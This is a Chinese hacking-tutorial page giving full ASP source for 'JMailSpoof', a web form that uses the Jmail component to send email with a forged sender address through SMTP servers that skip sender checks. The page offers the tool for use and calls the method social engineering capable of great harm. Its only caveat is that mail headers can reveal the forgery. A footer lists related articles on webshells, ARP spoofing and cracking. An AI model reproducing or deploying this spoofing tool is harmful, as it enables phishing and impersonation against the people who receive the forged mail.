[组图]伪造发件人邮件地址写了一个利用Jmail组件发匿名邮件的ASP代码,前提是你的SMTP服务器没有验证发件人地址才是,很多虚拟主机的SMTP服务器就可以的。
代码如下:
|
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <%if request("action")="send" then%> <% Dim strSubject,strEmail,strMailAdress,strSender,strContent,strFromer strSubject = Request("title") strContent = Request("content") strSender = Request("Name") strEmail = Request("to") strMailAddress = Request("smtp") strMailUser = Request("usr") strMailPass = Request("pwd") Set JMail = Server.CreateObject("JMail.Message") JMail.Charset = "gb2312" JMail.From = Request("From") JMail.FromName = strSender JMail.Subject =strSubject JMail.MailServerUserName = strMailUser JMail.MailServerPassword = strMailPass JMail.Priority = 3 JMail.AddRecipient(strEmail) JMail.Body = strContent JMail.Send(strMailAddress) %> <Script> alert('没报错就可能成功啦!'); </Script> <% else %> <style type="text/css"> <!-- body { margin-top: 0px;margin-bottom: 0px;}td { font-size: 12px; text-decoration: none;}--></style> <title>JMailSpoof v0.1</title><table width="500" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#666666"> <tr><td height="40" bgcolor="#E3E3E3"><div align="center">JMailSpoof by lake2</div></td></tr> <tr><td><table width="100%" height="392" border="0" align="center" cellpadding="1" cellspacing="1"> <form name="form" method="post" action="?action=send"> <tr bgcolor="#FFFFFF"> <td align="center"><div align="left">SMTP服务器*</div></td> <td><input name="smtp" type="text" id="smtp" size="22"></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center"><div align="left">用户名*</div></td> <td><input name="usr" type="text" id="usr" size="22"></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center"><div align="left">密码*</div></td> <td><input name="pwd" type="text" id="pwd" size="22"></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center"><div align="left">收件人邮箱*</div></td> <td><input name="to" type="text" id="to" size="22"></td> </tr> <tr bgcolor="#FFFFFF"> <td align="center"><div align="left">发件人邮箱*</div></td> <td><input name="from" type="text" id="from" size="22"> </td> </tr> <tr bgcolor="#FFFFFF"> <td width="110" align="center"><div align="left">邮件主题*</div></td> <td width="288"><input name="title" type="text" id="title" size="22"> </td> </tr> <tr bgcolor="#FFFFFF"> <td height="15" align="center"><div align="left">发件人姓名*</div></td> <td> <input name="name" type="text" id="name" size="22"></td> </tr> <tr bgcolor="#FFFFFF"> <td height="213" align="center"><div align="left">内容:*<br> </div></td> <td><textarea name="content" cols="50" rows="15"></textarea></td> </tr> <tr bgcolor="#FFFFFF"> <td> </td> <td><input type="submit" name="Submit" value="提交"></td> </tr> </form></table></td> </tr></table> <%end if%> |
试试效果先:
然后去邮箱看看:
呵呵,我们伪造了邮件地址,但是可以通过查看邮件头发现是邮件伪造的。
这就是传说中的社会工程学啦,用得好的话危害就大咯。
| Vista+谷歌拼音输入法重现输入法 | 04-06 | |
| 45种可以拿到Webshell的技巧 | 04-02 | |
| 0起步接触黑客--实用价值相当高 | 04-02 | |
| 普通文件的欺骗手法 | 03-21 | |
| 黑客技术-ARP欺骗 | 03-19 | |
| 跨站Script攻击和防范 | 03-19 | |
| 超级兔子+WinRAR轻松破解收费加密 | 03-16 | |
| 浏览器执行exe文件的探讨 | 03-15 | |
| 菜鸟"搜"大量Web Shell的思路 | 03-14 | |
| 轻松录制在线网络电视的方法 | 03-14 | |
| 突破单位网管封杀QQ、MSN 端口的 | 03-14 | |
| 菜鸟找漏洞—渗透网站的“反思” | 02-06 | |
您现在的位置: